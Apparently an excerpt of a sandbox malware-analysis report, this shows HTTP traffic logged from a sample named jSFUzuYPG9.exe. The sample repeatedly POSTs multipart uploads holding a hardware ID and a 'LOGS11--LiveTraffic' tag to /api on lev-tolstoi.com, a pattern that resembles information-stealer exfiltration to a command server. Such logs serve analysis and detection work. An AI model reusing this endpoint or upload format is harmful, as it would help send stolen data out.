                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 68 58 78 54 52 54 66 6d 68 32 75 65 58 57 76 31 71 32 58 63 47 47 47 42 66 72 4a 39 66 78 55 53 66 53 47 74 2f 62 62 79 53 62 54 63 56 43 70 5a 5a 74 61 76 52 6f 4d 41 66 76 69 4f 61 63 52 52 52 4e 42 43 4b 6c 6b 62 44 47 4e 63 4a 64 54 70 35 38 4a 56 73 65 6b 64 4c 6e 31 36 38 72 4e 75 6b 77 42 6e 73 62 4e 78 6b 44 42 78 6d 51 71 47 51 53 4d 4a 4f 67 45 70 73 63 6d 75 38 67 47 6b 36 48 41 44 66 47 76 6d 68 7a 75 65 58 57 74 31 36 7a 48 77 4c 48 58 70 62 71 70 68 62 77 6c 50 4e 42 79 70 6c 5a 36 48 53 4f 43 77 50 48 4a 68 4c 39 37 2b 57 6f 4d 4e 61 70 69 33 63 66 77 6f 57 61 6c 36 35 6e 6b 76 41 54 49 52 41 62 6e 78 6a 73 4a 5a 6b 50 52 6f 49 6b 31 2b 2b 70 64 6d 6a 78 68 54 33 59 70 6f 34 54 42 5a 30 45 50 50 62 62 4e 52 41 67 55 51 71 61 79 36 70 30 6d
                                                                                                                                                                                                                                                                        Data Ascii: hXxTRTfmh2ueXWv1q2XcGGGBfrJ9fxUSfSGt/bbySbTcVCpZZtavRoMAfviOacRRRNBCKlkbDGNcJdTp58JVsekdLn168rNukwBnsbNxkDBxmQqGQSMJOgEpscmu8gGk6HADfGvmhzueXWt16zHwLHXpbqphbwlPNByplZ6HSOCwPHJhL97+WoMNapi3cfwoWal65nkvATIRAbnxjsJZkPRoIk1++pdmjxhT3Ypo4TBZ0EPPbbNRAgUQqay6p0m
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC283INData Raw: 68 78 54 68 35 76 61 73 32 52 2f 35 65 35 68 44 44 78 39 69 56 37 33 62 55 76 41 4e 7a 55 5a 77 4e 44 69 4a 69 79 41 39 45 30 76 48 46 4b 79 68 31 71 44 56 44 50 6c 68 79 33 30 42 48 55 35 66 72 49 31 4f 77 45 43 63 51 43 5a 2f 62 66 44 63 49 44 30 48 53 38 63 55 6c 71 48 41 70 4f 41 5a 37 32 53 61 4f 45 77 57 65 68 44 7a 32 33 4f 50 55 59 35 5a 61 58 74 78 6a 74 49 34 49 79 46 4c 6c 45 4b 2b 74 74 57 78 78 42 66 79 66 4f 51 32 56 45 55 2b 41 76 6e 4a 48 39 41 44 6b 6e 59 6b 4e 47 48 77 79 6c 6b 6a 58 78 33 66 44 4f 76 6f 6c 72 57 50 51 72 34 71 32 57 51 65 46 32 39 47 71 4e 78 7a 38 57 53 62 51 32 31 6b 5a 36 65 64 49 48 52 66 42 4e 38 4d 67 4f 62 66 6f 4e 51 4c 36 47 44 4b 63 55 77 75 49 68 43 7a 32 78 57 50 64 6f 35 48 5a 48 4e 32 6f 64 39 48 4c 42 55
                                                                                                                                                                                                                                                                        Data Ascii: hxTh5vas2R/5e5hDDx9iV73bUvANzUZwNDiJiyA9E0vHFKyh1qDVDPlhy30BHU5frI1OwECcQCZ/bfDcID0HS8cUlqHApOAZ72SaOEwWehDz23OPUY5ZaXtxjtI4IyFLlEK+ttWxxBfyfOQ2VEU+AvnJH9ADknYkNGHwylkjXx3fDOvolrWPQr4q2WQeF29GqNxz8WSbQ21kZ6edIHRfBN8MgObfoNQL6GDKcUwuIhCz2xWPdo5HZHN2od9HLBU
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 32 63 35 62 0d 0a 35 51 57 33 68 34 36 4a 6e 2f 2b 69 79 41 73 58 31 50 4e 47 76 6d 30 6c 76 2b 50 58 66 31 2f 79 48 41 50 42 32 38 58 6c 61 56 71 31 55 36 4c 58 6e 74 4b 58 72 65 49 62 54 77 49 47 74 4e 42 75 71 6a 59 6f 4e 6c 61 73 43 33 56 4e 6c 51 6f 4c 42 6a 72 70 41 4f 50 57 38 30 52 4b 6b 46 6a 76 70 78 6e 4c 41 35 47 75 45 36 30 6f 4d 47 32 6a 31 53 2b 61 35 6f 75 58 46 38 73 56 4c 72 62 46 5a 38 52 31 68 77 35 49 7a 44 69 6a 53 34 6a 58 78 33 66 44 4f 76 6f 6c 72 57 50 51 72 34 71 32 57 51 65 46 32 39 47 71 4e 78 7a 38 57 32 4b 54 32 39 7a 63 50 4b 38 61 79 34 59 53 39 45 55 74 75 61 4f 6e 6f 39 53 76 6c 4b 55 4e 68 52 52 4e 42 43 65 6d 45 50 42 52 4a 74 59 4a 31 70 6e 74 70 64 6e 4b 6c 30 6c 6c 45 43 2b 35 70 6a 6e 79 56 71 6d 50 5a 51 32 43 41
                                                                                                                                                                                                                                                                        Data Ascii: 2c5b5QW3h46Jn/+iyAsX1PNGvm0lv+PXf1/yHAPB28XlaVq1U6LXntKXreIbTwIGtNBuqjYoNlasC3VNlQoLBjrpAOPW80RKkFjvpxnLA5GuE60oMG2j1S+a5ouXF8sVLrbFZ8R1hw5IzDijS4jXx3fDOvolrWPQr4q2WQeF29GqNxz8W2KT29zcPK8ay4YS9EUtuaOno9SvlKUNhRRNBCemEPBRJtYJ1pntpdnKl0llEC+5pjnyVqmPZQ2CA
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 6d 41 72 78 66 61 70 48 62 58 56 32 6f 49 56 76 64 54 45 39 76 6d 71 48 73 39 57 70 77 52 33 6f 66 4a 6f 34 54 42 34 73 43 4a 4c 62 42 59 39 38 77 77 6c 79 4e 44 6a 77 70 32 4d 30 45 51 79 4a 52 66 53 42 32 4b 44 4f 44 4f 35 36 31 54 6b 69 4a 30 30 51 35 64 74 4c 6a 78 76 66 42 79 70 77 63 66 44 4b 4d 47 68 45 58 73 77 44 36 66 54 4a 36 64 5a 61 36 43 32 43 4a 45 4a 52 66 68 44 7a 32 77 72 4d 55 5a 39 50 61 57 4a 6a 39 36 78 65 48 52 45 4d 6e 6b 4b 70 71 39 71 47 7a 41 76 30 55 2b 52 6a 44 78 39 69 56 37 32 4b 44 59 45 44 67 67 6b 79 54 53 44 34 30 6c 39 30 58 78 50 66 44 50 6d 54 31 61 6e 42 48 65 68 38 6c 31 45 43 46 6d 31 47 75 35 5a 42 37 6b 43 63 51 79 6f 36 49 4c 62 53 4f 47 68 52 53 35 74 46 2b 66 36 47 39 5a 52 50 72 54 71 4b 4a 42 4e 66 64 52 43
                                                                                                                                                                                                                                                                        Data Ascii: mArxfapHbXV2oIVvdTE9vmqHs9WpwR3ofJo4TB4sCJLbBY98wwlyNDjwp2M0EQyJRfSB2KDODO561TkiJ00Q5dtLjxvfBypwcfDKMGhEXswD6fTJ6dZa6C2CJEJRfhDz2wrMUZ9PaWJj96xeHREMnkKpq9qGzAv0U+RjDx9iV72KDYEDggkyTSD40l90XxPfDPmT1anBHeh8l1ECFm1Gu5ZB7kCcQyo6ILbSOGhRS5tF+f6G9ZRPrTqKJBNfdRC


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.1149727104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:45 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=HHOEN70NK
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 12799
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:45 UTC12799OUTData Raw: 2d 2d 48 48 4f 45 4e 37 30 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 48 4f 45 4e 37 30 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 48 4f 45 4e 37 30 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 48 4f 45 4e 37 30 4e 4b 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: --HHOEN70NKContent-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--HHOEN70NKContent-Disposition: form-data; name="pid"2--HHOEN70NKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HHOEN70NKConten
                                                                                                                                                                                                                                                                        2024-12-23 07:40:46 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=aaunb6ke4ii8gtlk4233ivesh3; expires=Fri, 18 Apr 2025 01:27:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfFMrcuQVjfkCY7pi9aOscgxy%2BWrOISX%2FwdaXKglj4Q1UM%2FwYCoTJYtkhKzzmmNhz9ifugE92Z2Sf9JwPKXqkCObEoSZrzn5zg8P2qQz%2Bzq10w3mSdQntIBNDf%2FHYYt59a4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b49238174271-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1569&rtt_var=592&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13729&delivery_rate=1841109&cwnd=252&unsent_bytes=0&cid=83aee3999fbb37a2&ts=1099&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:40:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 07:40:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.1149733104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:48 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=G0ZRODU1MVEYOK
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 15041
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:48 UTC15041OUTData Raw: 2d 2d 47 30 5a 52 4f 44 55 31 4d 56 45 59 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 30 5a 52 4f 44 55 31 4d 56 45 59 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 30 5a 52 4f 44 55 31 4d 56 45 59 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 47 30
                                                                                                                                                                                                                                                                        Data Ascii: --G0ZRODU1MVEYOKContent-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--G0ZRODU1MVEYOKContent-Disposition: form-data; name="pid"2--G0ZRODU1MVEYOKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--G0
                                                                                                                                                                                                                                                                        2024-12-23 07:40:48 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=k2op0nsvm5u8uv1n891b8r0bpg; expires=Fri, 18 Apr 2025 01:27:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dE3EfaGumgUqBHaCfPWrNW%2Bq1sRm%2BxQXwC1pbfdtcS2s8JfiiODjJI%2BW%2BIjD%2F02Ew3rpitlBCLWJbWL1wmdYqSNn9RpHvo3NpDhqXleyI%2F9lH%2BJHbchbtwzXxWO78GTUlYc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4a1b974435d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1545&rtt_var=594&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15976&delivery_rate=1820448&cwnd=128&unsent_bytes=0&cid=65ca308e1c570e18&ts=881&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:40:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 07:40:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.1149739104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:50 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 20410
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:50 UTC15331OUTData Raw: 2d 2d 56 53 4b 55 30 4e 55 39 42 41 47 31 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 53 4b 55 30 4e 55 39 42 41 47 31 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 53 4b 55 30 4e 55 39 42 41 47 31 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 56 53
                                                                                                                                                                                                                                                                        Data Ascii: --VSKU0NU9BAG1J2Content-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--VSKU0NU9BAG1J2Content-Disposition: form-data; name="pid"3--VSKU0NU9BAG1J2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--VS
                                                                                                                                                                                                                                                                        2024-12-23 07:40:50 UTC5079OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: lrQM/64G6(X&~`aO
                                                                                                                                                                                                                                                                        2024-12-23 07:40:51 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=djovtsfvln2qnk37mh6flfhc4o; expires=Fri, 18 Apr 2025 01:27:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZCfZoHsiesuHDIsGQsIFS0bxuuO4On6cbJylrchRNzsCMDcSafbob6NBmdsaMYjt57n%2Bee9LfSuOdGLu27SWKvtu%2BOEV%2BaeWJZRBm5BjaRf5d6o3R64oaNFNGFCSMCSNgQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4b0f8960f36-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=18288&min_rtt=1519&rtt_var=10617&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21367&delivery_rate=1922317&cwnd=228&unsent_bytes=0&cid=e0c12172f64da02d&ts=973&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:40:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 07:40:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.1149748104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:53 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=FFVY7DHX236
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1209
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:53 UTC1209OUTData Raw: 2d 2d 46 46 56 59 37 44 48 58 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 46 56 59 37 44 48 58 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 46 56 59 37 44 48 58 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 46 56 59 37 44 48 58 32 33 36
                                                                                                                                                                                                                                                                        Data Ascii: --FFVY7DHX236Content-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--FFVY7DHX236Content-Disposition: form-data; name="pid"1--FFVY7DHX236Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--FFVY7DHX236
                                                                                                                                                                                                                                                                        2024-12-23 07:40:53 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pa1o3i26hs9fs8ek8hmculsigl; expires=Fri, 18 Apr 2025 01:27:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1hbWPDBQKlwY0TmU6VVnHu6Mbjsyceu%2BIlla1w6b8x3y9hfm5zUxcXlLr51oEeYhhOENC3pTGO5pW8ldV3E3nQ%2Fw8pfS9LP9dTNqNgCYnzjd8xamfcWFhCMkASFQAQNcdg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4c0cc9cc34d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1458&rtt_var=560&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2118&delivery_rate=1929940&cwnd=252&unsent_bytes=0&cid=2d01f909b6134687&ts=641&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:40:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 07:40:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.1149755104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:55 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=2LZ5UATFIAIX09
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 588109
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
